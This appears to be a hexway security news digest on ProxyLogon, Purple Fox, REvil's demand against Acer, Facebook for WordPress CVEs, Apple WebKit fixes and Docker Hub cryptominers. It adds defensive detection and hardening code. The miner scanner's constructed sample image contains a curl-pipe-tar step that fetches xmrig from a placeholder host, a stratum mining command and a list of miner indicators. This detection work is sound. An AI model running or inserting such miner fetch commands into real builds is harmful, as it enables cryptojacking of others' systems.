CYBERSECURITY NEWS V. March – Microsoft Exchange Server hack, Purple Fox, RCE vulnerability in Facebook


hexway cybersecurity blog brings you the latest news about attacks and data breaches, emerging malware, and vendor security updates

News FYI

Massive Microsoft Exchange Server hack

The attacks began in early January 2021 and escalated into a large-scale hacking campaign. The attackers exploit four zero-day vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in Microsoft Exchange Server. According to Microsoft, the prime suspect is the Chinese government-sponsored Hafnium hacker group.

On March 2, 2021, Microsoft announced vulnerabilities in the Exchange Server email service used by private businesses and government agencies. The company has released emergency security updates for four versions of Exchange: 2010, 2013, 2016, and 2019. By March 5, only 10% of the affected devices were updated.

Four vulnerabilities in the Exchange mail server, which the researchers dubbed ProxyLogon, can be chained and exploited to authenticate to the Exchange server, gain administrator rights, install malware, and steal data. An attack proceeds in three stages. The first is to gain access to the Exchange server using stolen passwords or by exploiting undiscovered vulnerabilities. Next, a web shell is created to enable remote control over the compromised server. Finally, data can be stolen through that remote access.

More than 60,000 companies and organizations worldwide were attacked because of the vulnerabilities in Microsoft Exchange Server. In the United States alone, the number of victims amounts to at least 30,000.

Many countries worldwide have issued national security alerts warning about the threat and asking everyone to install patches as soon as possible. Currently, the number of unpatched Exchange Servers worldwide exceeds 125,000. In addition to the usual patches, Microsoft engineers prepared security updates for old and unsupported versions of Exchange and released a special PowerShell script designed to test Exchange servers.

Another problem is the backdoors left behind by the attackers: patches close the entry points, but they do not remove web shells or other persistence from organizations that have already been compromised.

Purple Fox malware spreads across Windows devices

The Purple Fox malware has been updated and can now spread among Windows machines like a worm.

It was first identified in 2018 after 30,000 devices had been infected. It is most commonly used as a downloader for other malware. Previously, Purple Fox targeted Windows systems mainly through browsers, exploiting memory corruption and privilege escalation vulnerabilities.

Purple Fox employs a new spreading technique: indiscriminate port scanning and leveraging of open SMB services with weak passwords and hashes. After detecting a vulnerable Windows system accessible via the Internet, the worm module is activated to brute-force SMB passwords. Nevertheless, it still uses old methods like phishing emails and browser vulnerabilities.

Purple Fox blocks several ports (445, 139, and 135) to prevent the infected machine from being reinfected or used by another attacker. Before restarting the infected device, Purple Fox installs an open-source rootkit to hide the files, folders, and Windows registry entries it has dropped. After the reboot, it renames its payload DLL to match a Windows system DLL and configures it to run at system startup. Once the malware is running, the infected machine acts as a worm, constantly scanning the Internet for other targets, trying to compromise them and add them to the botnet.
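The worm stage described above leaves a recognisable trace on the target side: a burst of failed network logons from one source, often against several account names, sometimes followed by a success. The following detection logic is an added example written for this digest, not code from hexway or from any vendor. It runs over constructed log lines that loosely imitate Windows Security events 4625 (failed logon) and 4624 (successful logon) flattened by a SIEM; the field layout and the sample addresses are assumptions, and thresholds should be tuned to the environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events, loosely modelled on Windows Security events
# 4625 (failed logon) and 4624 (successful logon) as a SIEM might flatten them.
# LogonType=3 is a network logon, which is what SMB authentication produces.
SAMPLE_EVENTS = """\
2021-03-20T10:00:01 EventID=4625 LogonType=3 TargetUserName=administrator IpAddress=203.0.113.7
2021-03-20T10:00:03 EventID=4625 LogonType=3 TargetUserName=admin IpAddress=203.0.113.7
2021-03-20T10:00:05 EventID=4625 LogonType=3 TargetUserName=guest IpAddress=203.0.113.7
2021-03-20T10:00:08 EventID=4625 LogonType=3 TargetUserName=backup IpAddress=203.0.113.7
2021-03-20T10:00:12 EventID=4625 LogonType=3 TargetUserName=test IpAddress=203.0.113.7
2021-03-20T10:00:15 EventID=4625 LogonType=3 TargetUserName=administrator IpAddress=203.0.113.7
2021-03-20T10:00:20 EventID=4624 LogonType=3 TargetUserName=administrator IpAddress=203.0.113.7
2021-03-20T10:01:00 EventID=4625 LogonType=3 TargetUserName=alice IpAddress=198.51.100.4
2021-03-20T10:02:00 EventID=4625 LogonType=2 TargetUserName=bob IpAddress=10.0.0.5
2021-03-20T10:05:00 EventID=4625 LogonType=3 TargetUserName=alice IpAddress=198.51.100.4
"""

EVENT_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<event_id>\d+) LogonType=(?P<logon_type>\d+) "
    r"TargetUserName=(?P<user>\S+) IpAddress=(?P<ip>\S+)$"
)


def parse_events(text):
    """Turn the flattened lines into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.fromisoformat(m["ts"]),
            "event_id": int(m["event_id"]),
            "logon_type": int(m["logon_type"]),
            "user": m["user"],
            "ip": m["ip"],
        })
    return events


def detect_smb_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Flag source IPs with at least `threshold` failed network logons inside
    any span of length `window`, and note whether a successful network logon
    from the same source followed the burst (the signature of a guessed password)."""
    failures = defaultdict(list)
    successes = defaultdict(list)
    for e in events:
        if e["logon_type"] != 3:
            continue  # only network logons are relevant to SMB password guessing
        if e["event_id"] == 4625:
            failures[e["ip"]].append(e)
        elif e["event_id"] == 4624:
            successes[e["ip"]].append(e)

    alerts = {}
    for ip, evs in failures.items():
        evs.sort(key=lambda e: e["ts"])
        best = None
        start = 0
        for end in range(len(evs)):
            # slide the left edge until the span fits inside `window`
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            burst = evs[start:end + 1]
            if len(burst) >= threshold and (best is None or len(burst) > len(best)):
                best = burst
        if best is None:
            continue
        last_failure = best[-1]["ts"]
        alerts[ip] = {
            "failed_logons": len(best),
            "distinct_users": len({e["user"] for e in best}),
            "first_seen": best[0]["ts"].isoformat(),
            "success_after_burst": any(s["ts"] >= last_failure for s in successes[ip]),
        }
    return alerts


if __name__ == "__main__":
    for ip, info in detect_smb_bruteforce(parse_events(SAMPLE_EVENTS)).items():
        print(ip, info)
```

On the sample data only 203.0.113.7 is flagged: six failures across five account names in fourteen seconds, followed by a successful network logon, which is the case that should page someone. The two spaced-out failures from 198.51.100.4 and the interactive (LogonType=2) failure stay below the bar. A host that suddenly starts blocking inbound 445, 139 and 135 after such a burst, as the article describes, is the follow-on indicator to correlate with.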

Since May 2020, the number of attacks has increased by about 600%; to date, there are 90,000 recorded incidents.

Acer attacked, hackers demand $50 million

The REvil group attacked Acer and demanded a ransom of $50 million. They provided a partial list of compromised data, including financial statements, bank credit accounts, other financial documents, and employee information.

A representative of Acer spoke with REvil on March 14. For the ransom, the group has promised to remove the stolen files and disclose the vulnerability that allowed them to attack Acer servers.

It is the largest ransom demand to date. REvil has already offered to reduce the ransom by 20% for timely payment.

Critical RCE vulnerability patched in Facebook

Two dangerous vulnerabilities were fixed in the Facebook for WordPress plugin, one of them with a score of 9 on the CVSS scale. It allows injecting malicious PHP code into a website and executing it remotely.

At the end of December, a critical vulnerability was discovered in Facebook for WordPress. It stems from unsafe deserialization in the run_action() function. The vulnerability (CVE-2021-24217) allows bypassing authentication, uploading arbitrary files to the site, and executing malicious code. The problem is present in Facebook for WordPress versions 2.2.2 and below; the developers fixed it in early January by releasing version 3.0.0 of the plugin.

Another one (CVE-2021-24218, CVSS score of 8.8), found on January 27, is a cross-site request forgery (CSRF) vulnerability that can be used in an XSS attack. According to Wordfence, it was introduced with the release of version 3 of the plugin. In preparation for rebranding, the developers rewrote most of the code and expanded the functionality, enabling AJAX when saving changes to the Facebook for WordPress settings. Intended to improve the plugin's integration, the new implementation turned out to be flawed. As a result, it was possible to change the plugin settings so that they pointed to the attacker's own console, stealing the site's metric data. An attacker would have to trick an authenticated admin into performing the desired action.

Moreover, since the settings are not sanitized, an attacker could add malicious JavaScript to the values, which would be executed in the administrator's browser upon entering the settings page. Using this script, it is possible to inject a backdoor or create a new administrator account to control the site. This CSRF/XSS vulnerability affects the plugin versions from 3.0.0 to 3.0.3. The developer fixed it in two steps last month; the full patch comes in version 3.0.4 (3.0.5 being the latest).
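The two plugin flaws above are the same handler going wrong in three places: request data fed to a deserializer, a settings-save action with no request-forgery check, and setting values echoed back into the admin page unescaped. The block below is an added example for this digest, written in Python rather than the plugin's PHP so the logic runs stand-alone; it is not the plugin's code and the option names (pixel_id, display_name, enable_ajax), the nonce scheme and the request shape are assumptions. It shows the hardened shape of such a handler: a per-session, per-action token (what WordPress calls a nonce) checked before anything else, settings accepted only as a flat JSON object against an allow-list rather than as a serialized object graph, and escaping on output.

```python
import hashlib
import hmac
import html
import json
import re

# Hypothetical settings schema standing in for a plugin's options page;
# the key names are assumptions, not the plugin's real option names.
PIXEL_ID_RE = re.compile(r"^\d{1,20}$")
MAX_NAME_LEN = 64


def issue_nonce(session_secret: bytes, action: str) -> str:
    """Derive a per-session, per-action token (the role a WordPress nonce plays)."""
    return hmac.new(session_secret, action.encode(), hashlib.sha256).hexdigest()


def verify_nonce(session_secret: bytes, action: str, provided) -> bool:
    """Constant-time comparison; a forged cross-site request has no way to know the secret."""
    expected = issue_nonce(session_secret, action)
    return isinstance(provided, str) and hmac.compare_digest(expected, provided)


def parse_settings(raw_body: str) -> dict:
    """Accept only a flat JSON object with allow-listed keys and validated values.
    Because the body is JSON and not a serialized object graph, no class is ever
    instantiated from request data, which is the root of the unserialize() problem."""
    data = json.loads(raw_body)
    if not isinstance(data, dict):
        raise ValueError("settings body must be a JSON object")
    clean = {}
    for key, value in data.items():
        if key == "pixel_id":
            if not isinstance(value, str) or not PIXEL_ID_RE.match(value):
                raise ValueError("pixel_id must be 1-20 digits")
        elif key == "display_name":
            if not isinstance(value, str) or len(value) > MAX_NAME_LEN:
                raise ValueError("display_name must be a short string")
        elif key == "enable_ajax":
            if not isinstance(value, bool):
                raise ValueError("enable_ajax must be a boolean")
        else:
            raise ValueError(f"unexpected setting {key!r}")
        clean[key] = value
    return clean


def save_settings(request: dict, session_secret: bytes, store: dict):
    """AJAX save handler. `request` is a constructed dict standing in for the POST:
    {'nonce': str, 'body': str}. Returns (status, message) and updates `store`."""
    if not verify_nonce(session_secret, "save_settings", request.get("nonce")):
        return 403, "nonce check failed"            # closes the CSRF path
    try:
        settings = parse_settings(request.get("body", ""))
    except ValueError as exc:                       # json.JSONDecodeError is a ValueError
        return 400, f"rejected: {exc}"
    store.update(settings)
    return 200, "saved"


def render_settings_page(store: dict) -> str:
    """Escape every stored value on output, so a value that slipped past
    validation still cannot execute as script in the administrator's browser."""
    rows = "".join(
        f"<tr><td>{html.escape(k)}</td><td>{html.escape(str(v))}</td></tr>"
        for k, v in sorted(store.items())
    )
    return f"<table>{rows}</table>"
```

The three checks are independent on purpose: the nonce stops the forged request, the allow-list rejects both a PHP-style serialized payload and unknown keys, and output escaping means that even the free-text display_name is harmless when the admin opens the settings page. Dropping any one of them reproduces one of the two CVEs described above.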

Apple fixes actively exploited vulnerability in iOS

Apple has released security updates for iPhone, iPad, iPod, and Apple Watch, addressing an actively exploited vulnerability.

Google's Threat Analysis Group discovered the vulnerability (CVE-2021-1879). It affects the WebKit browser engine and allows XSS attacks. An attacker would have to trick the victim into opening malicious web content on the device. Affected devices include iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, iPod touch (7th generation), iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, iPod touch (6th generation), and Apple Watch Series 3 and later. CVE-2021-1879 has been fixed in the iOS 14.4.2, iOS 12.5.2, and watchOS 7.3.3 releases. Users are advised to install the updates as soon as possible.

Neither Apple nor Google has disclosed detailed information about CVE-2021-1879.

Earlier this month, Apple released the iOS 14.4.1 emergency software update for all iPhone users. It shipped on a Monday without a prior beta, whereas the company usually releases new firmware on Tuesdays.

The vulnerability CVE-2021-1844 in Apple WebKit, which powers the Safari browser, could lead to arbitrary code execution.

So far, there is no information about it being exploited by hackers.

Cryptominers found in popular images on Docker Hub

Cryptocurrency miners were found in 30 container images with over 20 million downloads in total. The images were uploaded from 10 different accounts. In most cases, the attackers mined Monero, with XMRig being the most frequently used tool for this purpose, although some images mined Grin (GRIN) or Aronium (ARO) instead.
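A miner bundled into an image usually shows up in the image's own metadata before it ever runs: the entrypoint or command names the miner binary, its arguments carry a stratum pool URL, or a build step fetches the miner. The scanner below is an added example written for this digest, not code from Docker, Docker Hub or the researchers who found these images. It inspects a constructed OCI-style image configuration (the `config` and `history` fields, as `docker image inspect` or the registry's config blob exposes them); the indicator lists, the sample images and the placeholder hostnames are assumptions.

```python
import json
import re

# Constructed image configs in the shape of an OCI image configuration
# (subset of fields); neither describes a real image on Docker Hub.
BENIGN_IMAGE = json.dumps({
    "config": {
        "Entrypoint": ["/docker-entrypoint.sh"],
        "Cmd": ["nginx", "-g", "daemon off;"],
        "Env": ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],
    },
    "history": [
        {"created_by": "/bin/sh -c #(nop) ADD file:constructed in /"},
        {"created_by": "/bin/sh -c #(nop)  CMD [\"nginx\" \"-g\" \"daemon off;\"]"},
    ],
})

MINER_IMAGE = json.dumps({
    "config": {
        "Entrypoint": ["/usr/local/bin/xmrig"],
        "Cmd": ["-o", "stratum+tcp://pool.invalid:3333", "-u", "WALLET_PLACEHOLDER", "--donate-level=1"],
        "Env": ["PATH=/usr/local/bin:/usr/bin:/bin"],
    },
    "history": [
        {"created_by": "/bin/sh -c #(nop) ADD file:constructed in /"},
        {"created_by": "/bin/sh -c curl -sL http://downloads.invalid/xmrig.tar.gz | tar xz -C /usr/local/bin"},
    ],
})

# String indicators; known miner binaries, pool URL schemes and flags that are
# specific enough to miners that they rarely appear in legitimate images.
MINER_BINARIES = ("xmrig", "xmr-stak", "cpuminer", "minerd", "ethminer", "grin-miner")
BINARY_RE = re.compile(
    r"(?:^|[/\s\"'=])(" + "|".join(map(re.escape, MINER_BINARIES)) + r")(?=[\s\"'.\-]|$)"
)
STRATUM_RE = re.compile(r"stratum2?\+(?:tcp|ssl)://\S+", re.IGNORECASE)
MINER_FLAGS = ("--donate-level", "--nicehash", "--randomx-mode")


def _texts(config):
    """Yield (location, text) for every place a command can hide in the config."""
    cfg = config.get("config") or {}
    for field in ("Entrypoint", "Cmd", "Env"):
        for item in cfg.get(field) or []:
            yield f"config.{field}", item
    for i, layer in enumerate(config.get("history") or []):
        yield f"history[{i}].created_by", layer.get("created_by", "")


def scan_image_config(config_json):
    """Return a list of (location, description) findings; empty means no indicator hit."""
    config = json.loads(config_json)
    findings = []
    for location, text in _texts(config):
        lowered = text.lower()
        for m in BINARY_RE.finditer(lowered):
            findings.append((location, f"miner binary '{m.group(1)}'"))
        m = STRATUM_RE.search(text)
        if m:
            findings.append((location, f"stratum pool URL {m.group(0)}"))
        for token in lowered.split():
            if any(token.startswith(flag) for flag in MINER_FLAGS):
                findings.append((location, f"miner flag {token}"))
    return findings


if __name__ == "__main__":
    for name, image in (("benign", BENIGN_IMAGE), ("miner", MINER_IMAGE)):
        print(name, scan_image_config(image) or "clean")
```

Run against the constructed miner image this reports the binary in the entrypoint, the pool URL and the donate-level flag in the command, and the download step in the layer history, while the nginx image comes back clean. Metadata scanning is cheap and catches lazily built images, but a renamed or packed miner evades it, so it belongs alongside runtime signals such as sustained CPU saturation and outbound connections to pool ports rather than in place of them.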

The attackers were able to extract about $200,000 worth of cryptocurrency.

Docker Hub is the largest library of container images; it lets companies share images internally or with their customers, and lets developers distribute open-source projects.
